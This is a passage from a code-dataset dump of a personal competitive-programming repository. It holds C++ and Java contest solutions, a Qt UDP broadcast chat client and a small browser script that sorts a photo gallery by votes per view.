"alphanum_fraction": 0.5503494143486023, "avg_line_length": 28.013824462890625, "blob_id": "291a42b51ffdcbd434b796e5a4e5499c57bcb874", "content_id": "33a1ffa98773f586caee377e19f8a9425c3d0cf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6296, "license_type": "no_license", "max_line_length": 175, "num_lines": 217, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.14/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 June 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define 
forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"ref\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%.4f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... tail);\nvoid writeln(){printf(\"\\n\");}void writeln2(){printf(\"\\n\");}void readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\ntemplate <typename T> class Matrix\n{\npublic:\n std::vector<std::vector<T> > a;\n unsigned n;\n unsigned m;\n\n Matrix(unsigned n, unsigned m, const T& initial);\n Matrix(std::vector<std::vector<T> >& rhs);\n Matrix<T>& operator*=(const Matrix<T>& rhs);\n Matrix<T> operator*(const Matrix<T>& rhs);\n};\n\ntemplate<typename T>\nMatrix<T>::Matrix(std::vector<std::vector<T> >& rhs)\n{\n this->n = rhs.size();\n this->m = rhs[0].size();\n this->a = rhs;\n}\n\ntemplate<typename T>\nMatrix<T>::Matrix(unsigned n, unsigned m, const T& initial)\n{\n this->n = n;\n this->m = m;\n a.resize(n);\n fori(n)\n a[i].resize(m, initial);\n}\n\ntemplate<typename T>\nMatrix<T> Matrix<T>::operator*(const Matrix<T>& rhs)\n{\n unsigned n = this->n;\n unsigned m = rhs.m;\n Matrix result(n, m, (T) 0);\n fori(n)\n forj(m)\n for (unsigned k = 0; k < this->m; k++)\n result.a[i][j] += this->a[i][k] * rhs.a[k][j];\n return result;\n}\n\ntemplate<typename T>\nMatrix<T>& Matrix<T>::operator*=(const Matrix<T>& rhs)\n{\n Matrix result = (*this) * rhs;\n (*this) = result;\n return *this;\n}\n\ntemplate<typename 
T>\nstd::vector<T> operator*(const std::vector<T>& a, const Matrix<T>& rhs)\n{\n std::vector<T> result(rhs.m, (T) 0);\n for (int i = 0; i < rhs.m; ++i)\n for (int j = 0; j < a.size(); ++j)\n result[i] += a[j] * rhs.a[j][i];\n return result;\n}\n\nint n, m;\n\nvoid run()\n{\n readln(m);\n int x1, x2, x3, y1, y2, y3, z1, z2, z3, a, b, c, d, e, f, nx, ny, nz, nn, D, coef = 1.;\n vector<vector<int> > ddd = {{1, 0, 0, 0}, {0, 1, 0, 0}, {0, 0, 1, 0}, {0, 0, 0, 1}};\n Matrix<int> mtrx(ddd), temp(ddd);\n fori(m)\n readln(x1, y1, z1, x2, y2, z2, x3, y3, z3),\n a = x2 - x1, \n b = y2 - y1, \n c = z2 - z1, \n d = x3 - x1, \n e = y3 - y1, \n f = z3 - z1,\n nx = b * f - c * e,\n ny = c * d - a * f,\n nz = a * e - b * d,\n nn = nx * nx + ny * ny + nz * nz,\n D = -(nx * x1 + ny * y1 + nz * z1),\n coef *= nn,\n temp.a ={{-2 * nx * nx + nn, -2 * nx * ny, -2 * nx * nz, 0 }, \n {-2 * ny * nx, -2 * ny * ny + nn, -2 * ny * nz, 0 }, \n {-2 * nz * nx, -2 * nz * ny, -2 * nz * nz + nn, 0 }, \n {-2 * nx * D , -2 * ny * D , -2 * nz * D , nn}},\n mtrx *= temp;\n readln(n);\n vector<int> v(4);\n double x, y, z;\n fori(n)\n readln(v[0], v[1], v[2]),\n v[3] = 1,\n v = v * mtrx,\n x = v[0],\n y = v[1],\n z = v[2],\n writeln(x / coef, y / coef, z / coef);\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nvoid print(double a){printf(\" \" DOUBLEFORMAT,a);}\nvoid print(int a){printf(\" %d\",a);}\nvoid print(string a){printf(\" %s\",a.c_str());}\nvoid print(long long a){printf(\" %lld\",a);}\nvoid print(unsigned long a){printf(\" %ld\",a);}\nvoid print(unsigned int a){printf(\" %d\",a);}\nvoid print(char a){printf(\" %c\",a);}\nvoid print_no_space(double a){printf(DOUBLEFORMAT, a);}\nvoid print_no_space(int a){printf(\"%d\", a);}\nvoid print_no_space(string a){printf(\"%s\", a.c_str());}\nvoid print_no_space(long long a){printf(\"%lld\", a);}\nvoid print_no_space(unsigned 
long a){printf(\"%ld\", a);}\nvoid print_no_space(unsigned int a){printf(\"%d\", a);}\nvoid print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a);\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print(pair<Type1, Type2>& a){print(a.first);print(a.second);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print_no_space(pair<Type1, Type2>&a){print_no_space(a.first);print(a.second);}\ntemplate <class Head, class... Tail>\nvoid writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\nvoid read(double &a){scanf(\"%lf\",&a);}\nvoid read(int &a){scanf(\"%d\",&a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\",&a);}\nvoid read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2>\nvoid read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail>\nvoid readln(Head& head,Tail&... 
tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.30792036652565, "alphanum_fraction": 0.31702667474746704, "avg_line_length": 22.22051239013672, "blob_id": "40b3ada2706e170067aca7ae8a935407fc6a4ec1", "content_id": "7533d0f390edf5e6a290fd241ec42f58f3559fa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6614, "license_type": "no_license", "max_line_length": 78, "num_lines": 195, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/H.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\n \r\npublic class H {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n \r\n    class Node {\r\n        int b = 1, w = 0;\r\n        int f, t;\r\n        Node l, r;\r\n \r\n        int color = 0;\r\n \r\n        Node(int i) {\r\n            f = t = i;\r\n        }\r\n \r\n        Node(Node l, Node r) {\r\n            this.l = l;\r\n            this.r = r;\r\n            f = l.f;\r\n            t = r.t;\r\n            w = l.w + r.w;\r\n            b = l.b + r.b;\r\n        }\r\n \r\n        int get(int i) {\r\n            if (i < f || t < i) {\r\n                return -1;\r\n            }\r\n \r\n            if (color != -1) {\r\n                return color;\r\n            }\r\n \r\n            return Math.max(l.get(i), r.get(i));\r\n        }\r\n \r\n        void paint(int from, int to, boolean c) {\r\n            if (to < from || t < from || to < f) {\r\n                return;\r\n            }\r\n \r\n            if (from <= f && t <= to) {\r\n                if (c) {\r\n                    color = 1;\r\n                    w = t - f + 1;\r\n                    b = 0;\r\n                } else {\r\n                    b = t - f + 1;\r\n                    w = 0;\r\n                    color = 0;\r\n                }\r\n                return;\r\n            }\r\n \r\n  
          if (color != -1) {\r\n                l.paint(f, t, color == 1);\r\n                r.paint(f, t, color == 1);\r\n                color = -1;\r\n            }\r\n \r\n            l.paint(from, to, c);\r\n            r.paint(from, to, c);\r\n \r\n            w = l.w + r.w;\r\n            b = l.b + r.b;\r\n        }\r\n \r\n    }\r\n \r\n    public void solve() {\r\n        int m = 1_000_000;\r\n \r\n        Node[] tree = new Node[m];\r\n        for (int i = 0; i < m; i++) {\r\n            tree[i] = new Node(i);\r\n        }\r\n \r\n        while (m > 1) {\r\n            int k = 0;\r\n            for (int i = 1; i < m; i += 2) {\r\n                tree[k++] = new Node(tree[i - 1], tree[i]);\r\n            }\r\n            if (m % 2 == 1) {\r\n                tree[k++] = tree[m - 1];\r\n            }\r\n            m = k;\r\n        }\r\n        Node root = tree[0];\r\n        int n = in.nextInt();\r\n \r\n        while (--n >= 0) {\r\n            int q = in.nextInt();\r\n            if (q == 1) {\r\n                int l = in.nextInt() - 1, r = in.nextInt() - 1;\r\n                int c = in.nextInt();\r\n                root.paint(l, r, c == 1);\r\n            } else if (q == 2) {\r\n                int i = in.nextInt() - 1;\r\n \r\n                if (root.get(i) == 0) {\r\n                    out.println(\"WHITE\");\r\n                } else {\r\n                    out.println(\"BLACK\");\r\n                }\r\n            } else {\r\n \r\n                int c = in.nextInt();\r\n \r\n                if (c == 0) {\r\n                    out.println(root.b);\r\n                } else if (c == 1) {\r\n                    out.println(root.w);\r\n                } else {\r\n                    out.println(0);\r\n                }\r\n \r\n            }\r\n        }\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n              
  in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new H().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.5331636071205139, "alphanum_fraction": 0.5432208776473999, "avg_line_length": 27.08888816833496, "blob_id": "cfc6744219ea1f7fd4a0810ea2a2f86220e6b4e6", "content_id": "9b4fa0ae4e04af2793a4270efbf0f79237fccf9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 7936, "license_type": "no_license", "max_line_length": 108, "num_lines": 270, "path": "/study/ChatNotDemo/chatdialog.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " #include <QtGui>\r\n #include <cstdio>\r\n #include <string>\r\n #include <QUdpSocket>\r\n #include <ctime>\r\n #include <QNetworkInterface>\r\n\r\n #include \"chatdialog.h\"\r\n\r\n using namespace std;\r\n\r\n int getUniqeNick()\r\n {\r\n FILE *f;\r\n f = fopen(\"nick.txt\", \"r\");\r\n int i = 0;\r\n if (f != NULL)\r\n {\r\n fscanf(f, \"%d\", &i);\r\n fclose(f);\r\n }\r\n f = fopen(\"nick.txt\",\"w+\");\r\n fprintf(f, \"%d\", ++i);\r\n fclose(f);\r\n return i - 1;\r\n }\r\n\r\n void ChatDialog::getTime(time_t timer, char s[])\r\n {\r\n struct tm *t;\r\n time (&timer);\r\n t = localtime(&timer);\r\n sprintf(s, \"%d.%d %d:%d:%d\", t->tm_mday, t->tm_mon + 1, t->tm_hour, t->tm_min, t->tm_sec);\r\n }\r\n\r\n void ChatDialog::logMessage(const QString &nick, const QString &message)\r\n {\r\n QByteArray s1 = nick.toUtf8();\r\n const char *printedString1 = s1.data();\r\n QByteArray s2 = message.toUtf8();\r\n const char *printedString2 = s2.data();\r\n ::printf(\"#%d %s %s#\\n\", time(NULL), printedString1, printedString2);\r\n }\r\n\r\n QUdpSocket *udpSocket = new QUdpSocket(0);\r\n\r\n void ChatDialog::showHistory()\r\n {\r\n //QTextCodec::setCodecForCStrings(QTextCodec::codecForName(\"UTF8\"));\r\n freopen(\"history.tmp\", \"r\", stdin);\r\n char c;\r\n string s;\r\n time_t timer;\r\n while (true)\r\n {\r\n scanf(\"%c\", &c);\r\n if (c != '#')\r\n break;\r\n s = c;\r\n scanf(\"%d \", &timer);\r\n while(true)\r\n {\r\n scanf(\"%c\", &c);\r\n if (c == '#')\r\n break;\r\n s.push_back(c);\r\n }\r\n scanf(\"%c\\n\", &c);\r\n s.erase(0, 1);\r\n QString qstr(s.c_str());\r\n QTextCursor cursor(textEdit->textCursor());\r\n cursor.movePosition(QTextCursor::End);\r\n QColor color = textEdit->textColor();\r\n if (s[s.size() - 1] == 'd')\r\n 
textEdit->setTextColor(Qt::blue); else\r\n if (s[s.size() - 1] == 't')\r\n textEdit->setTextColor(Qt::gray);\r\n textEdit->append(tr(\"%1\").arg(qstr));\r\n textEdit->setTextColor(color);\r\n QScrollBar *bar = textEdit->verticalScrollBar();\r\n bar->setValue(bar->maximum());\r\n }\r\n fclose(stdin);\r\n }\r\n\r\n QString ChatDialog::localIP(int i)\r\n {\r\n QString locIP;\r\n QList<QHostAddress> addr = QNetworkInterface::allAddresses();\r\n locIP = addr.at(i).toString();\r\n return locIP;\r\n }\r\n\r\n ChatDialog::ChatDialog(QWidget *parent)\r\n : QDialog(parent)\r\n {\r\n setupUi(this);\r\n udpSocket->bind(3838, QUdpSocket::ShareAddress);\r\n lineEdit->setFocusPolicy(Qt::StrongFocus);\r\n textEdit->setFocusPolicy(Qt::NoFocus);\r\n textEdit->setReadOnly(true);\r\n listWidget->setFocusPolicy(Qt::NoFocus);\r\n connect(udpSocket, SIGNAL(readyRead()), this, SLOT(getMsg()));\r\n int i = getUniqeNick() + '0';\r\n myNickName = \"igorjan\";\r\n myNickName.append(i);\r\n tableFormat.setBorder(0);\r\n freopen(\"history.tmp\", \"a+\", stdout);\r\n showHistory();\r\n sendMsg(\"HELLO\", myNickName);\r\n }\r\n\r\n void ChatDialog::sendMsg(QString nick, QString msg)\r\n {\r\n if (msg != \"\")\r\n {\r\n QByteArray datagram;\r\n datagram.append(nick + ' ' + msg);\r\n udpSocket->writeDatagram(datagram.data(), datagram.size(), QHostAddress::Broadcast, 3838);\r\n msg = \"\";\r\n }\r\n }\r\n\r\n void ChatDialog::appendMessage(const QString &from, const QString &message)\r\n {\r\n if (from.isEmpty() || message.isEmpty())\r\n return;\r\n QTextCursor cursor(textEdit->textCursor());\r\n cursor.movePosition(QTextCursor::End);\r\n textEdit->append(tr(\"%1\").arg('<' + from + \"> \" + message));\r\n QScrollBar *bar = textEdit->verticalScrollBar();\r\n bar->setValue(bar->maximum());\r\n logMessage(\"<\" + from + \">\", message);\r\n }\r\n\r\n void ChatDialog::returnPressed()\r\n {\r\n QString text = lineEdit->text();\r\n if (text.isEmpty())\r\n return;\r\n sendMsg(\"MESSAGE\" + myNickName, 
text);\r\n lineEdit->clear();\r\n }\r\n\r\n QString ChatDialog::getUserList()\r\n {\r\n QString s;\r\n QList<QListWidgetItem*> items = listWidget->findItems(QString(\"*\"), Qt::MatchWrap | Qt::MatchWildcard);\r\n for (int i = 0; i < items.size(); i++)\r\n s.append(items.at(i)->text()),\r\n i == items.size() - 1 ? s.append('\\n') : s.append(' ');\r\n return s;\r\n }\r\n\r\n void ChatDialog::getMsg()\r\n {\r\n QByteArray datagram;\r\n datagram.resize(udpSocket->pendingDatagramSize());\r\n QHostAddress sender;\r\n quint16 senderPort;\r\n udpSocket->readDatagram(datagram.data(), datagram.size(), &sender, &senderPort);\r\n QString text = QString(datagram.data());\r\n QString nick = \"\";\r\n {\r\n if (text[0] == 'H')\r\n {\r\n text.remove(0, 6);\r\n newParticipant(text);\r\n// logMessage(myNickName + \"oooooo! \", s);\r\n }\r\n if (text[0] == 'Q')\r\n {\r\n text.remove(0, 5);\r\n participantLeft(text);\r\n }\r\n if (text[0] == 'M')\r\n {\r\n text.remove(0, 7);\r\n int i = 0;\r\n while (text[i] != ' ')\r\n nick += text[i],\r\n i++;\r\n text.remove(0, i + 1);\r\n //get time from string\r\n appendMessage(nick, text);\r\n }\r\n }\r\n }\r\n\r\n void ChatDialog::clearHistory()\r\n {\r\n QMessageBox msgBox;\r\n msgBox.setIcon(QMessageBox::Critical);\r\n QString str = \"Вы уверены, что хотите очистить всю историю сообщений?\";\r\n msgBox.setText(tr(\"%1\").arg(str));\r\n msgBox.setStandardButtons(QMessageBox::Yes | QMessageBox::No);\r\n if(msgBox.exec() == 16384)\r\n freopen(\"history.tmp\", \"w+\", stdout);\r\n }\r\n\r\n void ChatDialog::printf(QColor color, QString nick, QString did)\r\n {\r\n QColor curColor = textEdit->textColor();\r\n textEdit->setTextColor(color);\r\n textEdit->append(tr(\"* %1 has %2\").arg(nick, did));\r\n textEdit->setTextColor(curColor);\r\n QScrollBar *bar = textEdit->verticalScrollBar();\r\n bar->setValue(bar->maximum());\r\n logMessage(\"* \" + nick, \"has \" + did);\r\n }\r\n\r\n void ChatDialog::newParticipant(const QString &nick)\r\n {\r\n if 
(nick.isEmpty())\r\n return;\r\n printf(Qt::red, nick, \"joined\");\r\n listWidget->addItem(nick);\r\n }\r\n\r\n void ChatDialog::participantLeft(const QString &nick)\r\n {\r\n if (nick.isEmpty())\r\n return;\r\n QList<QListWidgetItem *> items = listWidget->findItems(nick, Qt::MatchExactly);\r\n if (items.isEmpty())\r\n return;\r\n delete items.at(0);\r\n printf(Qt::gray, nick, \"left\");\r\n }\r\n\r\n ChatDialog::~ChatDialog()\r\n {\r\n sendMsg(\"QUIT\", myNickName);\r\n logMessage(\"* \" + myNickName, \"has left\");\r\n //тут должно быть закрытие файла, по хорошему\r\n }\r\n /*void Receiver::run() {\r\n QUdpSocket *udpSocket = new QUdpSocket(0);\r\n udpSocket->bind(3838, QUdpSocket::ShareAddress);\r\n while (udpSocket->waitForReadyRead(-1)) {\r\n if (udpSocket->hasPendingDatagrams()) {\r\n QByteArray datagram;\r\n datagram.resize(udpSocket->pendingDatagramSize());\r\n QHostAddress sender;\r\n quint16 senderPort;\r\n udpSocket->readDatagram(datagram.data(), datagram.size(), &sender, &senderPort);\r\n QString text = QString(datagram.data());\r\n m1.lock();\r\n label->append(tr(\"%1\").arg(text));\r\n m1.unlock();\r\n }\r\n }\r\n}\r\n\r\nvoid Broadcaster::run() {\r\n QHostAddress a(QUdpSocket::ShareAddress);\r\n while (1) {\r\n m2.lock();\r\n if (mes != \"\") {\r\n QByteArray datagram;\r\n datagram.append(mes);\r\n QUdpSocket *udpSocket = new QUdpSocket(0);\r\n udpSocket->bind(3838, QUdpSocket::ShareAddress);\r\n udpSocket->writeDatagram(datagram.data(), datagram.size(), QHostAddress::Broadcast, 3838);\r\n mes = \"\";\r\n }\r\n m2.unlock();\r\n }\r\n}\r\n*/\r\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5868405699729919, "avg_line_length": 53.32258224487305, "blob_id": "fdf48b8843b407ce9b3140687a6fd5ba5469f195", "content_id": "7f960eb0db8e83b2508cd4739e97e9d3facb9114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1687, "license_type": "no_license", "max_line_length": 391, 
"num_lines": 31, "path": "/scripts/gs.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n(async () => {\n $('.gs-gallery__image__info').css('bottom', '52px');\n let photos = [];\n let filter = $('.gs-gallery__filter__active');\n let order = filter[0].children[0].innerText.toLowerCase();\n photos.push(...(await angular.element(filter).controller().metaData.PagesManager.api.photos.save({action: 'get_photos_public'}, {get_achievements: true, get_liked: true, get_likes: true, get_member: true, get_votes: true, limit: 80, member_id: angular.element(filter).controller().$rootScope.el_id, order, sort: 'desc', start: 0, type: 'photos', search: $('#input-0')[0].value})).items);\n photos.map(photo => {\n let j = $(`a[ng-href=\"/photo/${photo.id}\"]`);\n if (j && j.length) j = j[0].parentNode;\n if (j) j = j.parentNode;\n if (j) j = j.children;\n if (j && j.length) j = j[1];\n if (j && j.children && j.children.length >= 2) {\n j.appendChild(j.children[1].cloneNode(true));\n let child = j.lastChild.children[1];\n if (child)\n child.innerText = (photo.votes / photo.views).toFixed(1);\n }\n });\n const get = a => +a.children[1].lastChild.innerText;\n const list = $('.gs-gallery__grid')[0];\n list.children[0].remove();\n list.parentElement.insertBefore(list.cloneNode(), list.parentElement.firstChild);\n Array.prototype.slice.call(list.children).slice(0, 70)\n .sort((a, b) => get(a) - get(b))\n .map(x => list.parentNode.firstChild.appendChild(x.children[2]));\n .map(x => {\n x.chilren[2].insertBefore(x.children[1], x.children[2].firstChild);\n list.parentNode.firstChild.appendChild(x.children[2]);\n });\n})();\n\n\n" }, { "alpha_fraction": 0.41277846693992615, "alphanum_fraction": 0.4140395224094391, "avg_line_length": 22.285715103149414, "blob_id": "1414417978ce092db55af40b3eae7c5ee0bccec9", "content_id": "34658ddf457fe188887af30f04f68eddf47e4de3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3158, 
"license_type": "no_license", "max_line_length": 78, "num_lines": 98, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\nimport java.math.BigInteger;\r\n \r\nimport static java.lang.Math.*;\r\n \r\npublic class C {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n    final static Random rnd = new Random();\r\n \r\n    public void solve() {\r\n        char[] str = in.next().toLowerCase().toCharArray();\r\n        char[] p = { 'p', 'e', 'r' };\r\n        int n = str.length;\r\n        int ans = 0;\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            if (str[i] != p[i % 3]) {\r\n                ++ans;\r\n            }\r\n        }\r\n \r\n        out.println(ans);\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                
}\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new C().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.4027603566646576, "alphanum_fraction": 0.4316185712814331, "avg_line_length": 21.13888931274414, "blob_id": "cbca34dfb85b02db98b124b3b5d4e2695196e9c6", "content_id": "55d83b8f39c4ebb29559a57539c21ae2702ed665", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 797, "license_type": "no_license", "max_line_length": 61, "num_lines": 36, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.30/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <vector>\n \nusing namespace std;\n \nint n;\n \nvector <pair<int, int> > ans;\n \nint main() {\n freopen(\"beautifulgraph.in\", \"r\", stdin);\n freopen(\"beautifulgraph.out\", \"w\", stdout);\n cin >> n;\n if (n == 1){\n cout << \"1 0\";\n return 0;\n }\n if (n == 4){\n cout << \"4 4\" << endl;\n cout << \"1 2\" << endl;\n cout << \"2 3\" << endl;\n cout << \"3 4\" << endl;\n cout << \"4 1\" << endl;\n return 0;\n }\n if (n <= 3)\n ans.push_back({1, 2});\n for (int i = 3; i <= n; ++i){\n ans.push_back({1, i});\n ans.push_back({2, i});\n }\n cout << n << \" \" << ans.size() << endl;\n for (int i = 0; i < ans.size(); ++i)\n cout << 
ans[i].first << \" \" << ans[i].second << endl;\n}\n" }, { "alpha_fraction": 0.4038461446762085, "alphanum_fraction": 0.42851170897483826, "avg_line_length": 34.17647171020508, "blob_id": "e102ca5dca5f5414f54cf707f3f4231672a4f1d8", "content_id": "a5e2003bcb92e60ef81bc6e6c9738b787d23f359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2392, "license_type": "no_license", "max_line_length": 928, "num_lines": 68, "path": "/2013/2013RCC1/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
